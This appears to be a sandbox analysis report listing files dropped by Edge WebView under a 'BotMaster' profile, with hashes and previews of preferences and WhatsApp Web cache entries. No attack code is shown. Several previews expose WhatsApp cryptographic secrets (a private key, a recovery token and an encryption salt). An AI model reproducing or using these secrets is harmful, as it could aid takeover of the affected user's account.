                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\f2c2808a-79ea-49fd-945d-4371fab5d761.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                Entropy (8bit):5.399178866067169
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWRAWNj+bSSofPwXq6FrUwBvT1Y9B8HQXwlm9yJUA6XcIR6RX77XMq/dcUaI4JK/:YWyWNa2jPeqyrUwBKB8wXwlmUUAnIMpx
                                                                                                                                                                                                                MD5:F0DBC88A112BA6079512BCE7ABC3051C
                                                                                                                                                                                                                SHA1:F0243FC3D977BED02110A7F4EA99D1FAD67CDC83
                                                                                                                                                                                                                SHA-256:FA4672CCE8B30F669AD9DE23C7C16265D9C83AC99EA8F3943C93E2D1D4E70E57
                                                                                                                                                                                                                SHA-512:2FE3711E5BE43A4BEE99ABA1E5C52443169FEEDD740801961773D069E8C31A63E706DFA00D24E1F36125A62B5D1D59A04709731F69A07CA0BD4D2C9E21D468BE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"sts":[{"expiry":1741625192.556637,"host":"IN4MVOmjPvy672m6akZ9Q9TjfMfib7NqhGdJ6K/GKYU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089192.556642}],"version":2}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Preferences (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5988
                                                                                                                                                                                                                Entropy (8bit):4.851290637104523
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:st3/GQs13bb9JtG8zFd81h6Cb7/x+6MhmuecAJ1wa1eAees2MR7K:stPRsVtGk/8vbV+FcJmaQA+PhK
                                                                                                                                                                                                                MD5:D261CBA59B14381E95501DA07A161122
                                                                                                                                                                                                                SHA1:E8953F9DAFEFA84B5E939CFDA857CA538BD928B1
                                                                                                                                                                                                                SHA-256:38BBE2C88A013056F7F373565462D9D0CEC393141B95A61BEF0DB50BEB5AF731
                                                                                                                                                                                                                SHA-512:C94C2377C7FB9F8450024EC6E4E2A2FF9186738F371A24D6564F96BAEB1FA1CE8B603A3F2600534E03C88194B7CEA4758AE6CCA4B3445548B322AB487A46A90E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13354562762322933","alternate_error_pages":{"backup":true,"enabled":false},"autocomplete":{"retention_policy_last_version":117},"autofill":{"autostuff_enabled":false,"credit_card_enabled":false,"custom_data_enabled":false,"custom_data_fill_enabled":false,"custom_data_identify_info_from_form_enabled":false,"custom_data_save_enabled":false},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"browser_content_container_height":133,"browser_content_container_width":206,"browser_content_container_x":0,"browser_content_container_y":0,"countryid_at_install":17224,"credentials_enable_service":false,"dips_timer_last_update":"13354562762154074","domain_diversity":{"last_reporting_timestamp":"13354562762321885"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Preferences~RF61f8cf.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5988
                                                                                                                                                                                                                Entropy (8bit):4.851290637104523
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:st3/GQs13bb9JtG8zFd81h6Cb7/x+6MhmuecAJ1wa1eAees2MR7K:stPRsVtGk/8vbV+FcJmaQA+PhK
                                                                                                                                                                                                                MD5:D261CBA59B14381E95501DA07A161122
                                                                                                                                                                                                                SHA1:E8953F9DAFEFA84B5E939CFDA857CA538BD928B1
                                                                                                                                                                                                                SHA-256:38BBE2C88A013056F7F373565462D9D0CEC393141B95A61BEF0DB50BEB5AF731
                                                                                                                                                                                                                SHA-512:C94C2377C7FB9F8450024EC6E4E2A2FF9186738F371A24D6564F96BAEB1FA1CE8B603A3F2600534E03C88194B7CEA4758AE6CCA4B3445548B322AB487A46A90E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13354562762322933","alternate_error_pages":{"backup":true,"enabled":false},"autocomplete":{"retention_policy_last_version":117},"autofill":{"autostuff_enabled":false,"credit_card_enabled":false,"custom_data_enabled":false,"custom_data_fill_enabled":false,"custom_data_identify_info_from_form_enabled":false,"custom_data_save_enabled":false},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"browser_content_container_height":133,"browser_content_container_width":206,"browser_content_container_x":0,"browser_content_container_y":0,"countryid_at_install":17224,"credentials_enable_service":false,"dips_timer_last_update":"13354562762154074","domain_diversity":{"last_reporting_timestamp":"13354562762321885"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Preferences~RF627fb2.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5988
                                                                                                                                                                                                                Entropy (8bit):4.851290637104523
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:st3/GQs13bb9JtG8zFd81h6Cb7/x+6MhmuecAJ1wa1eAees2MR7K:stPRsVtGk/8vbV+FcJmaQA+PhK
                                                                                                                                                                                                                MD5:D261CBA59B14381E95501DA07A161122
                                                                                                                                                                                                                SHA1:E8953F9DAFEFA84B5E939CFDA857CA538BD928B1
                                                                                                                                                                                                                SHA-256:38BBE2C88A013056F7F373565462D9D0CEC393141B95A61BEF0DB50BEB5AF731
                                                                                                                                                                                                                SHA-512:C94C2377C7FB9F8450024EC6E4E2A2FF9186738F371A24D6564F96BAEB1FA1CE8B603A3F2600534E03C88194B7CEA4758AE6CCA4B3445548B322AB487A46A90E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13354562762322933","alternate_error_pages":{"backup":true,"enabled":false},"autocomplete":{"retention_policy_last_version":117},"autofill":{"autostuff_enabled":false,"credit_card_enabled":false,"custom_data_enabled":false,"custom_data_fill_enabled":false,"custom_data_identify_info_from_form_enabled":false,"custom_data_save_enabled":false},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"browser_content_container_height":133,"browser_content_container_width":206,"browser_content_container_x":0,"browser_content_container_y":0,"countryid_at_install":17224,"credentials_enable_service":false,"dips_timer_last_update":"13354562762154074","domain_diversity":{"last_reporting_timestamp":"13354562762321885"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\PreferredApps

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\README

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                Entropy (8bit):4.2629097520179995
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                                                                                                                                MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                                                                                                                                SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                                                                                                                                SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                                                                                                                                SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Secure Preferences (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6780
                                                                                                                                                                                                                Entropy (8bit):5.580563857813087
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:vUiUPlf/ROoBpkF5d1Qil7VaTEv9V5h5pg5vezodIU8z2KZSpsA5IOrMn3YPo0M7:tArsT9l57SpFIOAn3go0iuc
                                                                                                                                                                                                                MD5:B4B83991611C4211816ADBB125BF71C4
                                                                                                                                                                                                                SHA1:9B9A8C998EE2F3ABDDA29A2CB1A34F61B9D440FF
                                                                                                                                                                                                                SHA-256:2192040C259D97C6842AB2E3E496B2F38137F04A5328F6F4D15592F00AC6A031
                                                                                                                                                                                                                SHA-512:DF9A8F6BE1161F5DF91853FD00E16BF7DD5D2A3F0404F93FC99A23B3BB3B31E7F81D4CC2B74C0FF60C391E0A3F10EE593700E35EDFDA686970DB0D2A91299671
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"extensions":{"settings":{"dgiklkfkllikcanfonkcabmbdfmgleag":{"active_permissions":{"api":[],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13354562761313139","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13354562761313139","location":5,"manifest":{"content_capabilities":{"include_globs":["https://*excel.officeapps.live.com/*","https://*onenote.officeapps.live.com/*","https://*powerpoint.officeapps.live.com/*","https://*word-edit.officeapps.live.com/*","https://*excel.officeapps.live.com.mcas.ms/*","https://*onenote.officeapps.live.com.mcas.ms/*","https://*word-edit.officeapps.live.com.mcas.ms/*","https://*excel.partner.officewebapps.cn/*","https://*onenote.partner.officewebapps.cn/*","https://*powerpoint.partner.officewebapps.cn/*","https://*word-edit.partner.officewebapps.cn/*","https://*excel.gov.online.office365.us/*","

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\2a2b7cbbc61290b4_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                Entropy (8bit):5.944811109756377
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mFOY7QuuJx7Q99SCt4b32H7dw2MG7lKApFDU9LAZ:wOY7QLQ99Fmbudw2blJYL
                                                                                                                                                                                                                MD5:7C0F96AFE86FC25850600FC92A9F2230
                                                                                                                                                                                                                SHA1:17BECB7DAAAD0006C5ECF92CDB94FDD5C5E3E0A6
                                                                                                                                                                                                                SHA-256:1A203B3B5742623BCE3B540781DE983FCE4A14391B0E0D62CC354BBB8DCCCB78
                                                                                                                                                                                                                SHA-512:A4E21766235E3AFC2D154C16B74B72228AF59C867C87EBEA110BAE2A4DEF0DF37B49336E445E913AB33549F5E0CE62C1C84CB9A2777ED32955057EA54BA0F885
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......c....W......https://_user_prefs_key_store_.whatsapp.com/wa_web_user_prefs_cache_store_WAWebColumnPackingEnabledfalse.A..Eo......0h.+............GET.Y......." ..content-type..application/json0.......P.Z.unknown`.j.application/jsonx...............<.....,....y...>.,...H....?4.A..Eo......(';.k.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\6ea66fa5b36b4157_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):380
                                                                                                                                                                                                                Entropy (8bit):6.262458946826821
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:mWY7QuuJx7Q99vTh7+1GAk1MLThJtDb32H7p5w2MG7lbZsLOoCY4lh:FY7QLQ99V7+1LfTjpbubw2blbSVCY4
                                                                                                                                                                                                                MD5:BE6E69CCAAE003B21D719BB89D1F6340
                                                                                                                                                                                                                SHA1:DB8CA07906AFC1156C242A3BA375033B99316465
                                                                                                                                                                                                                SHA-256:E9551519CC4360FF2011318F11B2B6A183DF3F262D7C85007B65C21B2A17CB43
                                                                                                                                                                                                                SHA-512:F58792CC01E6D47A1B49A5F36BD1932B2FB980DA33AAE6854D26AACD18F929ADDCB49CC1776F06AC041B6CD7587E7F6BDA3CE05F615F28F1DD24557CD9BD37F8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......W....;.i....https://_user_prefs_key_store_.whatsapp.com/wa_web_user_prefs_cache_store_WANoiseInfoIv["JwDQVEHThQd9un4sPxAXPA==","AdTsOrn+K1wqvKOvpFxx8g==","F6Tf1CeWXIkeX23uyAgvtw=="].A..Eo.......L.hR...........GET.Y......." ..content-type..application/json0......P.Z.unknown`.j.application/jsonx.................-J...g .xZ..^....9..m.....CQP...A..Eo........7.k.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\92172a9e586cee2a_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):474
                                                                                                                                                                                                                Entropy (8bit):6.390494894024815
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:oY7QLQ99t4T/Ymqfu9ly//Lbu78w2blq:oQAwiT/0qM+ww2blq
                                                                                                                                                                                                                MD5:99D5991FFDD40975E40DD95AA9F4FB60
                                                                                                                                                                                                                SHA1:FC47B127CF5038BED1FF2E3B7F4D632A246ACE5F
                                                                                                                                                                                                                SHA-256:19BB7F928FDBE53D5C133F6F253490F2B02266BB359249FFFAA45DB9F85AF2D7
                                                                                                                                                                                                                SHA-512:FF28DD023A7FD2E4E7891145009E37DDFF4DD3088DA2DAEC3897276DFB2508E2160F8577C884C314080DFB22CE159518C18CB2AD4738E7DCBD47291C35F715F0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......Y......R....https://_user_prefs_key_store_.whatsapp.com/wa_web_user_prefs_cache_store_WAWebEncKeySalt"GKEkJWlAZjrfAUYP19ac6HuVrJo8tJLzCYnp2x97cMquN0q7SrSQlHTfMdgFnQ8Ay97vCDR0tS9YrugnRK5ydOq+KzHyxoFcF+EpRmFiDFJEHGxGm1fvN24Conkte9efJy/sn1YmN4hJR6JSgcOjdPdTbW3lQMgS476jR2/EE/w=".A..Eo......B.B.............GET.Y......." ..content-type..application/json0........P.Z.unknown`.j.application/jsonx..............3.N..ef.....>.C..T.1....gh.. .A..Eo........Nk.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\e6039a61e4d2a504_0

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):513
                                                                                                                                                                                                                Entropy (8bit):6.279812346054475
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:/Y7QLQ99vdHlOJ6/QQUuKQK8On0Nnbuz6w2blgMB:/QAwvdHlOAFn9quw2blgG
                                                                                                                                                                                                                MD5:B8FD080AF211EE2DB5FAFCFBB54B35A1
                                                                                                                                                                                                                SHA1:DEC720146A10A40FF03384AC7718F011B7441CFC
                                                                                                                                                                                                                SHA-256:7BB1D4937D845A1E21618E80908F2F6760793AC158E68E9F2315329C0A3A3E12
                                                                                                                                                                                                                SHA-512:24D45BBE43A572A3AEBCF7A06A89EB2E495A50DB60E8EA56C3F7CADE543F200F0EEE3C8BB7B3C8326E83CFCBF3E35E98A623352CC59D578B4F30F335A90B1CB3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m......U...Z.......https://_user_prefs_key_store_.whatsapp.com/wa_web_user_prefs_cache_store_WANoiseInfo{"privKey":"wSoykUuMOMrPEl3TL4/otK9UvC39P/Cw1BEB4rm6K9U4lrGpYpTMbYth0j4ngBET","pubKey":"AmfwLGVKXHu6qsmk9NrSwv0KlhpkitKAHEuVDGIYXeGByKKcXKetaTnZ3QydYsu4","recoveryToken":"x93p/h7whvvaKLTQv0N4AyN23t7t1iowuBmyKGSGqvo="}.A..Eo......5.d.............GET.Y......." ..content-type..application/json0........P.Z.unknown`.j.application/jsonx.................!I...o....#ln.z.f..6&.xA...NH.A..Eo........\.k.......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\index-dir\temp-index

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                Entropy (8bit):3.4191001711118285
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:hQyy4l/llBl0sv6SXl//NxX/YlXLsun:meflXjxqsu
                                                                                                                                                                                                                MD5:3E247E56F4B33FCCFC92EBAEB868F914
                                                                                                                                                                                                                SHA1:4D66467614640F77A057D9F9341188914A5440CB
                                                                                                                                                                                                                SHA-256:A86A4BCFBCE4DFC7F07F8C45B35C5F43579954BE02A80A49EB720A52850FED66
                                                                                                                                                                                                                SHA-512:AA5A19BF43841CA8757D7B56F8C4FE99BA45B48C4A24515DCA27116309A5E76E716001CC44C4FFC9F1DC07E9A16990F590C0A900F2355DE6DD1112CA793C3C1D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....."9.oy retne............................a......................|+*................WAk..o.n................*.lX.*.....................s.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\index-dir\the-real-index (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                Entropy (8bit):3.4191001711118285
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:hQyy4l/llBl0sv6SXl//NxX/YlXLsun:meflXjxqsu
                                                                                                                                                                                                                MD5:3E247E56F4B33FCCFC92EBAEB868F914
                                                                                                                                                                                                                SHA1:4D66467614640F77A057D9F9341188914A5440CB
                                                                                                                                                                                                                SHA-256:A86A4BCFBCE4DFC7F07F8C45B35C5F43579954BE02A80A49EB720A52850FED66
                                                                                                                                                                                                                SHA-512:AA5A19BF43841CA8757D7B56F8C4FE99BA45B48C4A24515DCA27116309A5E76E716001CC44C4FFC9F1DC07E9A16990F590C0A900F2355DE6DD1112CA793C3C1D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....."9.oy retne............................a......................|+*................WAk..o.n................*.lX.*.....................s.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\2c729997-e290-497a-ab91-2215fe9755ea\index-dir\the-real-index~RF6246ef.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                Entropy (8bit):3.4191001711118285
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:hQyy4l/llBl0sv6SXl//NxX/YlXLsun:meflXjxqsu
                                                                                                                                                                                                                MD5:3E247E56F4B33FCCFC92EBAEB868F914
                                                                                                                                                                                                                SHA1:4D66467614640F77A057D9F9341188914A5440CB
                                                                                                                                                                                                                SHA-256:A86A4BCFBCE4DFC7F07F8C45B35C5F43579954BE02A80A49EB720A52850FED66
                                                                                                                                                                                                                SHA-512:AA5A19BF43841CA8757D7B56F8C4FE99BA45B48C4A24515DCA27116309A5E76E716001CC44C4FFC9F1DC07E9A16990F590C0A900F2355DE6DD1112CA793C3C1D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....."9.oy retne............................a......................|+*................WAk..o.n................*.lX.*.....................s.q/.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\index.txt (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):136
                                                                                                                                                                                                                Entropy (8bit):4.983953148659464
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Vfyy+Q99sQRFXd14iUIyTXZDR8f5GWWiCNO5GWWigk:M7Q99XXzRRu4YRiC4YRigk
                                                                                                                                                                                                                MD5:176F3C74C7B6774B0C05EF2BB0FF4D58
                                                                                                                                                                                                                SHA1:92C4063537326CC6E662F47CFC6525203CD63E5E
                                                                                                                                                                                                                SHA-256:C7FF6E5F0338779F87BCF0EDBD4C0E076E4788A9FC7489C3FCE7D3FB341D7B29
                                                                                                                                                                                                                SHA-512:86B7FDE9A3163337033945335725100DB076A2D261651B2A58171F287CFDBFDDCD642FEE47ABF4190F4B92628E22DED3BF51F9D4726B720C0A3743D13A407BA3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.L..wa_web_user_prefs_cache_store.$2c729997-e290-497a-ab91-2215fe9755ea...(.0...https://web.whatsapp.com/..https://web.whatsapp.com/ .(.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Service Worker\CacheStorage\0bf6ab7f94a21cdc9c1649f884333ec20f40a544\index.txt.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):136
                                                                                                                                                                                                                Entropy (8bit):4.983953148659464
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Vfyy+Q99sQRFXd14iUIyTXZDR8f5GWWiCNO5GWWigk:M7Q99XXzRRu4YRiC4YRigk
                                                                                                                                                                                                                MD5:176F3C74C7B6774B0C05EF2BB0FF4D58
                                                                                                                                                                                                                SHA1:92C4063537326CC6E662F47CFC6525203CD63E5E
                                                                                                                                                                                                                SHA-256:C7FF6E5F0338779F87BCF0EDBD4C0E076E4788A9FC7489C3FCE7D3FB341D7B29
                                                                                                                                                                                                                SHA-512:86B7FDE9A3163337033945335725100DB076A2D261651B2A58171F287CFDBFDDCD642FEE47ABF4190F4B92628E22DED3BF51F9D4726B720C0A3743D13A407BA3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.L..wa_web_user_prefs_cache_store.$2c729997-e290-497a-ab91-2215fe9755ea...(.0...https://web.whatsapp.com/..https://web.whatsapp.com/ .(.

